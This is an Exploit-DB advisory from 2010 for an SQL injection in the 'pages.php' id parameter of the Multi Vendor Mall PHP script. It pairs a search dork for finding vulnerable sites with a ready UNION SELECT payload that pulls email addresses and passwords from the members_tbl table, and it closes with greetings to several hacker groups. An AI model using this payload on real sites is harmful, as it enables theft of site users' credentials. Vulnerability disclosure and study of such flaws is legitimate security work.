Multi Vendor Mall - 'pages.php' SQL Injection

EDB-ID:

12748

CVE:

N/A


Platform:

PHP

Published:

2010-05-26

============================================================
Multi Vendor Mall  (pages.php) SQL Injection Vulnerability
============================================================


#################################################################################################

[+] Multi Vendor Mall (pages.php) SQL Injection Vulnerability

[+] By Newbie_Campuz

[+] Published: 2010-05-24 Pukul 22.00 WIB

[+] jatimcrew.org/

##################################################################################################

# Script Homepage:
# http://www.multishopcms.com

[+]Dork: pages.php?id= "Multi Vendor Mall"

[+] SQL Injection


	http://[target]/[path]/pages.php?id=[SQL]

	http://[target]/[path]/pages.php?id=-9999+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--


Example :

http://[site]/pages.php?id=7+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--

##################################################################################################
Thanks to Allah SWT n Nabi Muhammad SAW

Special Thanks to : 	
My Parent, My Brother n My Sister
Byz9991, Doraemon, Bang_Napi, Kenthot_cakep, Bom2, Shamus, Chapzha, Ficarciruas, pheonixhaxor, mywisdom, 
Pr3tty, newbie_043, KidDevilz, Android2009, XcyberX, flyff666, MISTERFRIBO, Osean, Vhacx,jamsh0ut, elfata
cybermuttaqin,k3m4ngi, roentah,zhombhie, techno_x46 and YOU... !!!

All admin, momod, spamguard, staff and member Jatim Crew..
All admin, momod, spamguard, staff and member Indonesianhacker
All admin, momod, spamguard, staff and member xteamweb
All admin, momod, spamguard, staff and member h2ozones
All admin, momod, spamguard, staff and member master-forum
##################################################################################################